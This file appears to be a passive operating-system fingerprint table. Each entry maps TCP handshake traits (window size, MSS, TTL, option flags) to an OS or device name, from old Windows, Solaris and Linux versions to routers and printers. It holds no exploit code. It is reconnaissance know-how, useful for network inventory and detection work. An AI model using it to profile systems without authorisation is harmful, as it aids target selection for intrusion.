16D0:05B4:FF:WS:1:1:0:0:S:30:Windows 98 16D0:05B4:FF:WS:1:1:1:0:A:LT:Linux 2.4.10 16D0:05B4:FF:WS:1:1:1:0:S:30:Windows 98 16D0:9C05:40:WS:1:1:1:0:A:30:Linux 2.4.18 16D0:B405:40:00:1:1:1:1:S:3C:Linux 2.4.18 16D0:B405:40:00:1:1:1:1:S:LT:Redhat Linux 7.1 (Kernel 2.4.2) 16D0:B405:40:01:1:1:1:1:S:LT:SuSe 8.0 Linux 2.4.18 16D0:B405:40:WS:0:0:0:0:A:2C:HP LaserJet 4050N 16D0:B405:40:WS:0:0:0:0:A:LT:SMC Broadband / MacSense Router 16D0:B405:40:WS:0:0:1:0:A:2C:RedHat Linux 7.3 (2.4.18) 16D0:B405:FF:WS:0:0:0:0:A:2C:LinkSys Router 16D0:_MSS:80:00:0:0:0:0:A:LT:HP Color LaserJet 4500N, Jet Direct J3113A/2100 16D0:_MSS:80:00:0:1:1:0:A:LT:Windows NT4 / Win95 / Win98 16D0:_MSS:80:00:0:1:1:1:A:LT:Windows NT4 / Win95 / Win98 16D0:_MSS:80:WS:0:0:0:0:A:LT:HP Color LaserJet 4500N, Jet Direct J3113A/2100 16D0:_MSS:80:WS:0:0:1:0:A:LT:Linux 2.4.7 (X86) 1770:0578:40:WS:0:0:1:0:A:2C:SMC Router SMC7004VBR 1800:04EC:80:WS:1:1:0:0:A:30:NetWare 6 SP3 1800:0558:80:WS:0:0:1:0:A:LT:Novell Netware 5.1 SP3 1800:0558:80:WS:0:0:1:0:S:2C:Novel Netware 4.0 1800:05B4:40:00:0:1:1:1:S:3C:VMS 1800:05B4:80:00:0:1:1:0:A:30:Novel Netware 5.1 1800:05B4:80:00:1:1:1:0:A:34:Novell Netware 5.1 1800:05B4:80:00:1:1:1:0:S:34:Novell Netware 6.0 1800:05B4:80:WS:0:0:1:0:A:2C:Novell Netware 4.0 / 5.0 1800:05B4:80:WS:0:0:1:0:S:2C:Novell Netware 5.1 1800:05B4:80:WS:1:1:1:0:A:30:Netware 5.1 SP5 1800:5805:80:WS:0:0:1:0:A:LT:Novell Netware 5.1 1800:_MSS:40:WS:0:0:1:0:A:LT:VMS MultiNet V4.2(16) / OpenVMS V7.1-2 1800:_MSS:80:00:0:1:0:0:A:LT:OpenVMS 6.2 - 7.2-1 on VAX or AXP 1800:_MSS:80:00:0:1:0:1:A:LT:OpenVMS 6.2 - 7.2-1 on VAX or AXP 1800:_MSS:80:00:0:1:1:0:A:LT:VMS MultiNet V4.2(16)/ OpenVMS V7.1-2 1800:_MSS:80:00:0:1:1:1:A:LT:VMS MultiNet V4.2(16)/ OpenVMS V7.1-2 1800:_MSS:80:WS:0:0:0:0:A:LT:IPAD Model 5000 or V.1.52 1800:_MSS:80:WS:0:0:1:0:A:LT:Novell Netware 5.0 SP5 1860:05B4:80:WS:1:1:1:0:A:30:Windows XP Pro 1920:05B4:40:WS:1:1:0:0:S:30:Windows 98 192F:_MSS:80:00:0:0:0:0:A:LT:Mac OS 7.0-7.1 With MacTCP 1.1.1 - 2.0.6 192F:_MSS:80:WS:0:0:0:0:A:LT:Mac OS 7.0-7.1 With MacTCP 1.1.1 - 2.0.6 1AB8:0564:40:WS:1:1:1:0:A:LT:IRIX 1C52:05AA:40:00:1:1:1:1:S:40:Windows XP Pro 1C84:05B4:40:WS:0:0:1:0:A:2C:Linux 1C84:_MSS:80:WS:0:0:0:0:A:LT:Instant Internet box 1D4C:_MSS:80:WS:0:0:0:0:A:LT:Sega Dreamcast 1F0E:_MSS:80:WS:0:0:0:0:A:LT:AmigaOS AmiTCP/IP 4.3 1FB0:0FD8:40:WS:0:0:0:0:A:2C:Actiontec ADSL modem 1FB0:0FD8:40:WS:0:0:0:0:A:2C:Actiontec ADSL mom 1FE0:0550:80:WS:1:1:1:0:S:30:Windows 1FFE:0218:FF:WS:0:0:0:0:A:2C:Linux Debian 1FFE:0546:FF:WS:0:0:0:0:A:2C:Linux Debian 2.4 1FFE:055C:FF:WS:0:0:0:0:A:2C:Linux Debian woody 1FFE:0584:FF:WS:0:0:0:0:A:2C:Linux Debian 1FFE:0596:FF:WS:0:0:0:0:A:2C:Windows 1FFE:05AC:FF:WS:0:0:0:0:A:2C:Linux Debian 1FFE:05B4:FF:WS:0:0:0:0:A:2C:Linux Debian 1FFF:_MSS:80:00:0:0:1:0:A:LT:Novell NetWare 3.12 - 5.00 1FFF:_MSS:80:WS:0:0:1:0:A:LT:NetWare 4.11 SP7- 5 SP3A BorderManager 3.5 2000:0002:40:00:0:1:0:0:A:LT:Mac OS 9/Apple ShareIP 2000:0109:40:WS:0:0:0:0:A:LT:Cisco CacheOS 1.1.0 2000:0200:40:WS:0:0:0:0:A:2C:ForeThought ASX200BX 2000:0200:40:WS:0:0:0:0:A:LT:QNX / Amiga OS 2000:0200:80:WS:1:1:1:0:S:30:Windows XP - Windows 98 2000:020C:40:00:0:1:0:1:A:LT:OS/400 2000:0218:20:WS:1:1:0:0:S:30:Windows XP 2000:0218:40:WS:0:0:0:0:A:LT:OS/400 2000:0218:80:00:1:1:1:0:S:30:Windows 9x 2000:0218:80:WS:1:1:1:0:S:30:Windows 9x or 2000 2000:052A:80:WS:1:1:1:0:S:30:Windows 98 2000:0534:80:WS:1:1:1:0:S:30:Windows 98 2000:0550:80:WS:1:1:1:0:S:30:Windows 9x 2000:0556:80:WS:1:1:1:0:S:30:Windows 98 SE 2000:0564:40:WS:0:0:0:0:A:2C:Linux 2000:0564:80:WS:1:1:1:0:S:30:Windows 98 2000:056C:40:00:0:1:0:1:A:3C:IBM AS400 2000:0584:40:WS:0:0:0:0:A:2C:Linux (debian 2.0) 2000:0586:80:WS:1:1:1:0:S:30:Windows 9x or NT4 2000:0588:80:WS:1:1:1:0:S:30:Windows 98SE 2000:0598:80:WS:1:1:1:0:S:30:Windows 2000 2000:059C:40:00:0:1:0:1:A:3C:Windows NT 2000:059C:80:WS:1:1:1:0:S:30:Windows 98 2000:05AC:40:00:0:1:0:0:A:30:OS 400 2000:05AC:40:WS:0:0:0:0:A:2C:Windows 2000:05AC:40:WS:0:0:1:0:A:2C:AS400 2000:05AC:80:WS:0:0:1:0:S:2C:Windows NT 4.0 2000:05AC:80:WS:1:1:1:0:S:30:Windows 98 SE 2000:05B0:20:WS:0:0:1:0:S:2C:Windows 95 2000:05B0:80:00:1:1:1:0:S:40:Linux 2.2.13 2000:05B0:80:00:1:1:1:1:S:LT:Windows 95 2000:05B0:80:WS:0:0:0:0:A:2C:D-Link DI 614v2.2 2000:05B0:80:WS:1:1:1:0:S:30:Windows NT SP3 2000:05B4:08:WS:1:1:0:0:S:30:Windows 2000 2000:05B4:20:00:0:0:1:0:S:2C:Windows NT 4.0 2000:05B4:20:WS:0:0:1:0:S:2C:Windows 95 2000:05B4:20:WS:1:1:0:0:S:LT:Slackware Linux 7.1 Kernel 2.2.16 2000:05B4:20:WS:1:1:1:0:S:30:Windows 98 2000:05B4:40:00:0:1:0:0:A:30:SMC Barricade Wireless router 2000:05B4:40:00:0:1:1:0:S:3C:BSDI BSD/OS 3.1 2000:05B4:40:00:0:1:1:0:S:LT:BSDI BSD/OS 3.1 2000:05B4:40:00:0:1:1:1:A:3C:FreebSD 5.0 RELEASE (x86) 2000:05B4:40:00:1:1:1:0:S:3C:BSDI BSD/OS 3.0-3.1 (or MacOS, NetBSD) 2000:05B4:40:00:1:1:1:0:S:40:WebTV netcache engine (BSDI) 2000:05B4:40:00:1:1:1:1:S:40:WindowsXP 2000:05B4:40:WS:0:0:0:0:A:2C:Linux 2000:05B4:40:WS:0:0:0:0:S:2C:CacheFlow 500x CacheOS 2.1.08 - 2.2.1 2000:05B4:40:WS:0:0:1:0:A:2C:Apple Airport Express v6.1 2000:05B4:40:WS:0:0:1:0:S:2C:AXCENT Raptor Firewall Windows NT 4.0/SP3 2000:05B4:40:WS:1:1:1:0:S:30:Windows XP 2000:05B4:80:00:0:0:1:0:S:2C:Windows NT 4.0 2000:05B4:80:00:0:0:1:0:S:LT:Windows NT 4.0 2000:05B4:80:00:1:1:1:0:S:2C:Windows 9x 2000:05B4:80:00:1:1:1:0:S:30:Windows 9x 2000:05B4:80:00:1:1:1:0:S:40:Windows 9x 2000:05B4:80:00:1:1:1:1:S:40:Windows 95 2000:05B4:80:WS:0:0:0:0:A:2C:D-Link DWL-900AP 2000:05B4:80:WS:0:0:0:0:S:2C:Windows NT 4.0 2000:05B4:80:WS:0:0:1:0:A:2C:Windows 2000 2000:05B4:80:WS:0:0:1:0:S:2C:Windows NT 4.0 SP6a / Windows 2000 2000:05B4:80:WS:1:0:1:0:S:2C:Windows NT 2000:05B4:80:WS:1:0:1:0:S:LT:Windows NT 2000:05B4:80:WS:1:1:0:0:S:30:Windows 95 2000:05B4:80:WS:1:1:1:0:A:30:Windows 2000 2000:05B4:80:WS:1:1:1:0:S:30:Windows 98 / 2000 2000:05B4:80:WS:1:1:1:0:S:3C:Linux 2.2.19 2000:05B4:80:WS:1:1:1:0:S:LT:Windows 98 2000:05B4:FF:WS:1:1:0:0:S:30:Windows XP SP1 2000:05B4:FF:WS:1:1:1:0:S:30:Windows 98SE 2000:6363:80:WS:1:1:1:0:S:LT:Microsoft NT 4.0 Server SP5 2000:6D70:40:WS:0:0:0:0:A:2C:Linux 2000:B405:20:WS:0:0:0:0:A:LT:HP Ux 9.x 2000:B405:20:WS:0:0:1:0:S:LT:Windows 2000 2000:B405:40:00:0:1:0:1:A:3C:Apple AirPort Base Station 2000:B405:40:00:0:1:1:1:A:3C:windows 98 2000:B405:80:00:0:1:0:1:A:3C:Cisco VPN3002 HW Client 2000:B405:80:WS:0:0:1:0:S:LT:Windows 98 / NT 2000:B405:80:WS:1:1:1:0:S:30:Windows 98 / XP 2000:B405:FF:WS:1:1:1:0:S:30:Windows 98se 2000:_MSS:40:WS:0:0:0:0:S:LT:Mac OS 8.6 2000:_MSS:40:WS:0:0:1:0:A:LT:BSDI BSD/OS 2000:_MSS:80:00:0:0:0:0:A:LT:IBM VM/ESA 2.2.0 CMS Mainframe System 2000:_MSS:80:00:0:0:1:0:A:LT:Novell NetWare 3.12 - 5.00 2000:_MSS:80:00:0:1:0:0:A:LT:Accelerated Networks - High Speed Integrated Access VoDSL 2000:_MSS:80:00:0:1:0:1:A:LT:Tandem NSK D40 2000:_MSS:80:00:0:1:1:0:A:LT:AS/400e 720 running OS/400 R4.4 2000:_MSS:80:00:0:1:1:1:A:LT:AS/400e 720 running OS/400 R4.4 2000:_MSS:80:WS:0:0:0:0:A:LT:AGE Logic, Inc. IBM XStation 2010:_MSS:80:WS:0:0:1:0:A:LT:Windows NT / Win9x 2017:0534:80:WS:0:0:1:0:A:2C:Windows 98 SE 2017:05B4:40:00:0:1:1:1:A:LT:BSDI BSD/OS 3.0-3.1 (or possibly MacOS, NetBSD) 2017:05B4:80:WS:0:0:1:0:A:2C:Windows 98 SE / Windows NT 4.0 2017:1802:80:WS:0:0:1:0:A:LT:Windows NT 4.0 2017:_MSS:80:00:0:1:0:0:A:LT:Ascend GRF Router running Ascend Embedded/OS 2.1 2017:_MSS:80:00:0:1:1:0:A:LT:BSDI 4.0-4.0.1 2017:_MSS:80:00:0:1:1:1:A:LT:BSDI 4.0-4.0.1 2017:_MSS:80:WS:0:0:0:0:A:LT:CacheOS (CacheFlow 500-5000 webcache) CFOS 2.1.08 - 2.2.1 2017:_MSS:80:WS:0:0:1:0:A:LT:3Com NetBuilder & NetBuilder II OS v 9.3 2058:0564:40:WS:0:0:1:0:A:2C:BSDi BSD/OS 4.0.1 2058:0564:80:WS:0:0:0:0:A:2C:Windows NT 2058:0564:80:WS:0:0:1:0:A:2C:Windows 2000 / NT / Win9x 2058:05B4:80:WS:1:1:1:0:A:LT:Windows 98 SE 2058:6405:80:WS:0:0:1:0:A:LT:Windows 20D0:0578:40:00:1:1:1:1:A:40:Windows 20D0:0578:80:WS:0:0:1:0:A:2C:Windows NT 4.0 Server 2118:0584:80:WS:0:0:0:0:A:2C:Checkpoint FW-1 4.1 on Solaris 2.6 2120:_MSS:80:WS:0:0:1:0:A:LT:Gauntlet 4.0a firewall on Solaris 2.5.1 2130:0588:80:WS:1:1:1:0:A:30:Windows 98 SE 2142:058B:40:00:1:1:1:1:A:40:Windows NT 2180:0218:80:00:1:1:1:1:S:40:Windows XP SP2 2180:0218:80:WS:1:1:1:0:A:30:Windows 98 2180:05B0:80:WS:0:0:1:0:A:2C:Windows NT - Windows 9x 2180:05B4:20:WS:0:0:1:0:A:2C:Windows XP 2180:05B4:80:00:1:1:1:1:S:40:Windows 9x 2180:05B4:80:WS:0:0:1:0:A:2C:Windows NT / Win9x 2180:_MSS:20:WS:0:0:1:0:A:LT:Windows NT / Win9x 2180:_MSS:40:WS:0:0:1:0:A:LT:BSDI BSD/OS 2190:05B4:20:WS:0:0:1:0:A:LT:Windows NT / Win9x 2190:05B4:80:WS:0:0:1:0:A:LT:Windows NT / Win9x 21D2:05B4:80:WS:0:0:1:0:A:LT:Windows NT / Win9x 21F0:05B4:80:00:1:1:1:1:A:40:vXWorks 21F0:05B4:80:WS:0:0:1:0:A:LT:Windows NT 4.0 2200:_MSS:80:00:0:1:0:0:A:LT:Stock OpenVMS 7.1 2200:_MSS:80:00:0:1:0:1:A:LT:Stock OpenVMS 7.1 2200:_MSS:80:00:0:1:1:0:A:LT:OpenVMS 6.2/Alpha 2200:_MSS:80:00:0:1:1:1:A:LT:OpenVMS 6.2/Alpha 2200:_MSS:80:WS:0:0:0:0:A:LT:Linux 2.0.34-38 2208:05AC:40:WS:1:1:1:0:A:30:Linux 2208:05B4:80:WS:0:0:1:0:A:2C:Windows NT 2208:05B4:80:WS:1:1:1:0:A:30:Windows 98 SE 2220:05B0:80:WS:1:1:1:0:A:30:Windows NT 2220:_MSS:40:WS:0:0:1:0:A:LT:BSDI BSD/OS 2220:_MSS:80:WS:0:0:1:0:A:LT:Windows NT / Win9x 2229:_MSS:80:00:0:0:1:0:A:LT:Solaris 2.5, 2.5.1 2229:_MSS:80:WS:0:0:0:0:A:LT:DG/UX Release R4.11MU02 2229:_MSS:80:WS:0:0:1:0:A:LT:Solaris 2.3 - 2.4 2238:0218:40:WS:1:1:1:0:A:30:Windows 98 2238:0218:80:WS:1:1:1:0:S:30:Windows 2000 Pro 2238:0550:80:WS:1:1:1:0:S:LT:Linux 2238:0564:80:WS:0:0:1:0:A:30:Solaris 2.7 2238:0564:80:WS:1:1:1:0:S:30:Solaris 2238:0564:FF:00:0:0:1:0:S:2C:Solaris 2.7 2238:0584:80:WS:0:0:1:0:A:30:Linux Red Hat 2238:05AC:40:WS:0:0:0:0:A:2C:Windows 98 2238:05B4:20:WS:0:0:0:0:A:LT:Snap Server (Quantum) 2238:05B4:20:WS:0:0:1:0:A:2C:Microsoft Windows 95 2238:05B4:20:WS:1:1:1:0:S:30:Windows 98 2238:05B4:40:00:0:0:1:0:S:LT:Solaris 2.6 2238:05B4:40:00:0:1:0:0:A:30:Hp jetDirect 2238:05B4:40:00:0:1:0:1:A:3C:SMC Barricade SMC7004VWBR 2238:05B4:40:00:0:1:1:1:A:3C:IRIX 2238:05B4:40:00:0:1:1:1:A:LT:BSDI BSD/OS 3.0 2238:05B4:40:00:1:1:1:1:A:40:Cisco IOS 2238:05B4:40:WS:0:0:0:0:A:2C:Linksys WAP11 2238:05B4:40:WS:0:0:1:0:A:2C:Cisco IOS 2238:05B4:40:WS:0:0:1:0:A:LT:BSDI BSD/OS 3.0-3.1 (or possibly MacOS, NetBSD) 2238:05B4:40:WS:1:1:1:0:A:30:Windows NT4 2238:05B4:40:WS:1:1:1:0:S:30:Windows XP SP1 + Sygate Personal Firewall 2238:05B4:80:00:1:1:1:1:A:40:Windows 98 2238:05B4:80:WS:0:0:0:0:A:2C:Windows NT 4.x 2238:05B4:80:WS:0:0:1:0:A:2C:Windows NT 4.x / Win9x 2238:05B4:80:WS:0:0:1:0:A:30:Windows 2238:05B4:80:WS:1:1:0:0:A:30:Windows 98 2238:05B4:80:WS:1:1:1:0:A:30:Windows 98 / 2000 / XP 2238:05B4:80:WS:1:1:1:0:S:30:Windows 2000 - XP SP1 2238:05B4:FF:00:0:0:1:0:S:2C:Solaris 2.6 or 2.7 2238:05B4:FF:00:0:1:0:0:A:30:SunOS 5.7 2238:05B4:FF:00:0:1:1:0:A:30:SunOS 5.7 2238:05B4:FF:WS:0:0:1:0:A:2C:SunOS 5.7 2238:05B4:FF:WS:0:0:1:0:A:LT:OpenBSD 2238:05B4:FF:WS:0:0:1:0:S:2C:SunOS 5.7 Generic sun4u sparc 2238:05B4:FF:WS:0:1:1:0:S:2C:Solaris 2.6 or 2.7 2238:05B4:FF:WS:1:0:1:0:S:2C:Solaris 2.6 - 2.7 2238:05B4:FF:WS:1:1:1:0:A:30:SunOS 5.7 2238:1128:80:WS:0:0:1:0:A:2C:Novell Netware 2238:1144:80:WS:0:0:1:0:A:2C:Windows NT 4.0 2238:9805:80:00:0:1:0:1:A:3C:Windows XP Professional 2238:B405:20:WS:0:0:1:0:A:2C:Windows 95 2238:B405:40:00:0:1:1:1:A:3C:Windows 2000 / XP 2238:B405:80:00:0:1:1:1:A:3C:Windows 95 2238:B405:80:WS:0:0:1:0:A:2C:Windows 2000 2238:B405:FF:00:0:1:1:0:A:LT:Solaris 2238:B405:FF:WS:0:0:0:0:A:2C:Solaris 2.5.1 2238:B405:FF:WS:0:0:1:0:A:LT:Solaris 2.5.1 2238:B405:FF:WS:0:0:1:0:S:LT:Solaris 7 2238:_MSS:40:WS:0:0:1:0:A:LT:BSDI BSD/OS 2238:_MSS:80:WS:0:0:0:0:A:LT:HP printer w/JetDirect card 223F:05AC:FF:WS:0:0:0:0:A:2C:Windows 98 223F:05B4:FF:WS:0:0:0:0:A:2C:Solaris 2.6 223F:7805:FF:WS:0:0:0:0:A:LT:Solaris 2274:04EC:80:WS:1:1:1:0:A:30:Windows 98 2274:04EC:FF:WS:1:1:1:0:A:30:Symantec Raptor Firewall 2274:0564:80:WS:0:0:1:0:A:2C:PIX FireWall 2284:114E:40:00:1:1:1:1:A:3C:Solaris 2297:0109:FF:00:0:1:1:1:A:3C:Solaris 2.6 -7 (SPARC) 2297:_MSS:80:00:0:1:1:0:A:LT:Raptor Firewall 6 on Solaris 2.6 2297:_MSS:80:00:0:1:1:1:A:LT:Raptor Firewall 6 on Solaris 2.6 2328:_MSS:FF:WS:0:0:1:0:A:LT:Solaris 2.6 - 2.7 2332:_MSS:80:00:0:0:1:0:A:LT:Solaris 2.3 - 2.4 2332:_MSS:80:WS:0:0:0:0:A:LT:Solaris 2.4 w/most Sun patches 2332:_MSS:80:WS:0:0:1:0:A:LT:Solaris 2.3 - 2.4 2398:0218:FF:WS:0:0:1:0:A:2C:SunOS 5.6 239C:_MSS:80:WS:0:0:0:0:A:LT:Apollo Domain/OS SR10.4 23B4:23B4:FF:00:0:0:1:0:S:LT:Solaris 2.6 2400:_MSS:FF:WS:0:0:1:0:A:LT:Solaris 2.6 - 2.7 246C:0534:80:WS:0:0:1:0:A:2C:Windows NT 4.0 2491:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 with tcp_strong_iss=0 2491:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 with tcp_strong_iss=0 2530:0550:80:WS:1:1:1:0:A:30:windows 98 2530:05B4:80:WS:0:0:1:0:A:LT:Windows 2000 2544:_MSS:80:00:0:0:1:0:A:LT:Solaris 2.3 - 2.4 2568:0564:FF:00:1:1:1:1:A:40:Solaris 8 2568:0564:FF:WS:0:1:0:1:A:38:Solaris 2568:0564:FF:WS:1:1:1:1:A:3C:Solaris 2580:05AC:80:WS:1:1:1:0:A:30:Windows 2000 Sp3 (Build2195) 25BC:0564:FF:WS:0:0:1:0:A:2C:Windows 25BC:0564:FF:WS:0:0:1:0:A:LT:Solaris 25BC:0564:FF:WS:1:1:1:0:A:30:Solaris 2648:0584:FF:00:1:1:1:1:A:40:Windows 2000 NT 2648:8405:FF:00:0:1:1:1:A:LT:Solaris 26E2:058E:FF:WS:1:1:1:0:A:30:SunOS 5.7 2756:_MSS:80:WS:0:0:0:0:A:LT:AmigaOS AmiTCP/IP Genesis 4.6 2760:05AC:FF:00:1:1:1:1:A:40:Solaris 7 2788:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 2788:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 2798:05B4:FF:00:0:1:1:0:A:LT:Solaris 2798:05B4:FF:00:0:1:1:1:A:3C:Solaris 2.6 / SunOS 5.6 2798:05B4:FF:00:1:1:1:1:A:40:SunOS 5.7 2798:B405:FF:00:0:1:0:1:A:3C:Solaris 6 2798:B405:FF:00:0:1:1:1:A:3C:Solaris 7 2798:_MSS:FF:WS:0:0:1:0:A:LT:Solaris 2.6 - 2.7 2800:05B4:80:WS:0:0:0:0:S:2C:Tiptel Innovaphone IP200 V4.00 sr4 2800:05B4:80:WS:1:1:1:0:S:30:Windows XP Professional SP1 2A20:0550:FF:00:0:1:1:1:A:3C:SunOS 5.6 sum4m sparc SUNW,SPARCstation-20 2D24:_MSS:80:00:0:1:1:1:A:LT:Linux Kernel 2.4.xx (X86) 2D25:_MSS:80:WS:0:0:0:0:A:LT:Mac OS 7.0-7.1 With MacTCP 1.1.1 - 2.0.6 2DA0:B405:40:00:0:1:0:0:A:30:HPirect J6039A 2DA0:_MSS:80:WS:0:0:0:0:A:LT:Windows 98SE + IE5.5sp1 3000:05B4:FF:WS:0:0:0:0:A:2C:BeOS 3000:05B4:FF:WS:0:0:0:0:S:2C:BeOS 5.0 3000:05B4:FF:WS:0:1:0:0:S:2C:BeOS 5.0 3000:_MSS:80:WS:0:0:0:0:A:LT:Acorn Risc OS 3.6 (Acorn TCP/IP Stack 4.07) 37FF:_MSS:80:WS:0:0:0:0:A:LT:Linux 1.2.13 3840:0564:40:WS:0:0:0:0:S:2C:Windows 98 3908:05B4:40:00:1:1:0:1:S:40:HPUX 11.11 3908:05B4:40:00:1:1:1:1:A:3C:IPCop v1.2.0 3908:05B4:40:WS:1:1:0:0:S:30:Windows 98 SE 3908:05B4:40:WS:1:1:1:0:A:30:Linux Debian 3908:05B4:40:WS:1:1:1:0:S:30:windows 2000 Professional 3908:05B4:80:WS:1:1:1:0:A:30:Linux 2.0.3 3C00:_MSS:80:WS:0:0:0:0:A:LT:Linux 2.0.27 - 2.0.30 3C0A:_MSS:80:00:0:1:1:0:A:LT:Linux 2.1.19 - 2.2.17 3C0A:_MSS:80:00:0:1:1:1:A:LT:Linux 2.1.19 - 2.2.17 3CAC:0584:40:00:1:1:1:1:A:3C:Linux 2.2.16 3E43:_MSS:80:00:0:1:0:0:A:LT:AIX 4.1-4.1.5 3E43:_MSS:80:00:0:1:0:1:A:LT:AIX 4.1-4.1.5 3E64:05AC:40:00:0:1:1:1:A:3C:Debian 3.0 3E64:05AC:40:00:1:1:1:0:S:3C:Windows 98 3E64:05AC:40:00:1:1:1:1:A:4C:Linux 2.2.x 2.4.x 3E64:05AC:40:00:1:1:1:1:S:3C:Linux Debian 3.0 (kernel 2.2) 3E64:05AC:40:WS:1:1:1:0:A:30:Debian GNU/Linux 3.0 R4 \"Woody\" 3E80:0584:40:WS:0:0:0:0:A:2C:HM210di Configuration Manager GUI 3E80:05A6:80:WS:0:0:0:0:A:2C:Windows xp 3E80:05B4:FF:WS:0:0:0:0:A:2C:CiscoATA-186 3E80:_MSS:80:WS:0:0:0:0:A:LT:Alcatel Advanced Reflexes IP Phone, Version: E/AT400/46.8 3E80:_MSS:80:WS:0:0:1:0:A:LT:VersaNet ISP-Accelerator(TM) Remote Access Server 3EBC:05B4:40:00:1:1:0:1:A:3C:Linux 2.2.17 GNU Debian/Potato 3EBC:05B4:40:00:1:1:1:0:A:34:Linux Slackware 8.0 3EBC:05B4:40:00:1:1:1:0:S:3C:Debian/Caldera Linux 2.2.x 3EBC:05B4:40:00:1:1:1:1:A:3C:Linux 2.2.19 or 2.4.17 3EBC:05B4:40:00:1:1:1:1:S:3C:Linux 2.2.16 - 2.2.19 3EBC:05B4:40:WS:0:0:0:0:A:2C:AIX 4.3.2 3EBC:05B4:40:WS:0:0:1:0:A:2C:AIX 4.3 3EBC:05B4:40:WS:0:0:1:0:A:LT:Debian GNU/Linux 3EBC:05B4:40:WS:1:1:1:0:A:30:Linux 2.2.19 3EBC:05B4:40:WS:1:1:1:0:A:LT:Linux 2.2.19 3EBC:05B4:80:WS:0:0:0:0:A:2C:Novell Netware 3EBC:B405:40:00:1:1:1:1:S:LT:Slackware Linux v7.1 - Linux Kernel 2.2.16 3ED0:0218:40:WS:0:0:1:0:A:LT:Linux Slackware 8.0 3F20:0650:40:00:1:1:1:1:S:3C:Linux 2.2.19 3F25:0109:40:00:0:1:1:1:A:3C:Linux 2.2.17 - 2.2.19 3F25:_MSS:80:00:0:1:0:0:A:LT:AIX 4.3.2.0-4.3.3.0 on an IBM RS/* 3F25:_MSS:80:00:0:1:0:1:A:LT:AIX 4.3.2.0-4.3.3.0 on an IBM RS/* 3F25:_MSS:80:00:0:1:1:0:A:LT:Linux 2.1.19 - 2.2.17 3F25:_MSS:80:00:0:1:1:1:A:LT:Linux 2.1.19 - 2.2.17 3F25:_MSS:80:WS:0:0:0:0:A:LT:AIX 3.2 3F25:_MSS:80:WS:0:0:1:0:A:LT:Linux 2.2.19 3FE0:05B4:40:WS:0:0:0:0:A:2C:Caldera OpenLinux(TM) 1.3 / RedHat 7.2 / FreeSCO 0.2.7 3FE0:_MSS:80:00:0:0:0:0:A:LT:Linux 2.0.32-34 3FF0:_MSS:80:00:0:0:0:0:A:LT:Linux 2.0.34-38 3FF0:_MSS:80:WS:0:0:0:0:A:LT:AtheOS ( www.atheos.cx ) 3FFF:_MSS:80:WS:0:0:0:0:A:LT:IBM MVS (unknown version) 4000:0000:40:WS:0:0:0:0:S:LT:ULTRIX V4.5 (Rev. 47) 4000:01F4:80:WS:1:1:0:0:A:30:Windows 4000:0200:40:00:0:0:0:0:S:2C:AIX 3.2, 4.2 - 4.3 4000:0200:40:00:0:1:0:0:S:3C:OpenBSD 2.6-2.8 4000:0200:40:00:0:1:0:1:A:3C:IPSO 3.3 / Net BSD 1.5.2 4000:0200:40:00:0:1:0:1:S:LT:OpenBSD 4000:0200:40:00:1:1:0:1:S:LT:FreeBSD 4000:0200:40:WS:0:0:0:0:A:2C:AIX 4.3 4000:0200:40:WS:0:0:0:0:S:LT:BorderWare 5.2 4000:0200:FF:WS:0:0:0:0:A:2C:Windows 2000 4000:0218:80:00:1:1:1:1:S:LT:Windows XP Home 4000:023C:40:00:1:1:1:0:S:40:OpenBSD 3.0 4000:023C:80:WS:1:1:1:0:S:30:Windows NT SP4+ 4000:0400:40:00:0:1:0:1:A:3C:IPSO 3.7 4000:0400:40:WS:0:0:0:0:A:2C:Xerox 440 Document center 4000:04EC:80:WS:1:1:1:0:S:30:Windows 2000 4000:04F8:80:WS:1:1:1:0:S:30:Windows NT SP3 4000:0528:80:WS:1:1:1:0:S:30:Windows XP pro 4000:052A:80:WS:1:1:0:0:S:30:Windows 2000 Server 4000:0530:80:WS:1:1:1:0:S:30:Windows 2000 4000:0534:80:WS:1:1:1:0:S:30:Windows 2000 4000:0542:80:WS:1:1:1:0:S:30:Windows ME 4000:0550:40:WS:0:0:0:0:A:2C:Windows 2000 4000:0550:40:WS:0:0:1:0:A:2C:NetBSD 4000:0550:80:WS:0:0:0:0:A:2C:Mac OS 4000:0550:80:WS:0:0:1:0:A:2C:Windows 2000 4000:0550:80:WS:1:1:1:0:S:30:Windows 2000 4000:0556:80:WS:1:1:1:0:S:30:Windows XP 4000:0562:80:WS:1:1:1:0:S:30:Windows 2000 4000:0564:80:WS:1:1:0:0:S:30:Windows 2000 4000:0564:80:WS:1:1:1:0:S:30:Windows 2000 / Windows XP Sp2 4000:0578:40:00:0:1:0:1:A:3C:NetBSD 1.6 4000:0578:40:00:1:1:1:1:S:40:OpenBSD 3.0 4000:0578:80:WS:1:1:1:0:S:30:Windows 2000 4000:0578:FF:00:1:1:0:1:A:40:Windows 2000 / 2003 4000:057A:80:WS:1:1:1:0:S:30:Windows 2000 4000:057E:80:WS:1:1:1:0:S:30:Windows XP (Home) 4000:0582:80:WS:1:1:1:0:S:30:Microsoft Windows 2000 Professional SP4 4000:0584:20:WS:1:1:0:0:S:30:Windows ME 4000:0584:80:00:1:1:0:1:A:40:Windows 4000:0584:80:WS:1:1:1:0:S:30:Windows 2000 4000:0586:80:WS:1:1:1:0:S:30:Windows 2000 4000:0588:80:WS:1:1:1:0:S:30:Windows ME 4000:058A:80:WS:1:1:1:0:S:30:Windows 2000 4000:058C:80:WS:1:1:1:0:S:30:Free BSD 4000:0596:80:WS:1:1:1:0:S:30:Linux Red Hat 4000:0598:40:WS:0:0:0:0:A:2C:Linux Debian 3.0 4000:0598:40:WS:1:1:0:0:A:30:Windows 4000:0598:80:00:1:1:1:1:S:40:Windows XP 4000:0598:80:WS:1:1:1:0:S:30:Windows 2000 4000:05A0:80:WS:1:1:1:0:S:30:Windows XP Pro 4000:05A4:80:WS:1:1:1:0:S:30:Windows 4000:05AC:40:00:1:1:1:1:S:40:OpenBSD 3.1 4000:05AC:80:WS:1:1:0:0:A:30:Windows 2000 4000:05AC:80:WS:1:1:1:0:S:30:Windows 2000 / XP 4000:05B0:80:WS:1:1:1:0:S:30:Window 2000 pro. SP2 4000:05B4:01:WS:1:1:1:0:S:30:Windows 2003 4000:05B4:20:WS:1:1:1:0:S:30:Windows 4000:05B4:40:00:0:0:1:0:S:2C:FreeBSD 4.0-STABLE, 3.2-RELEASE 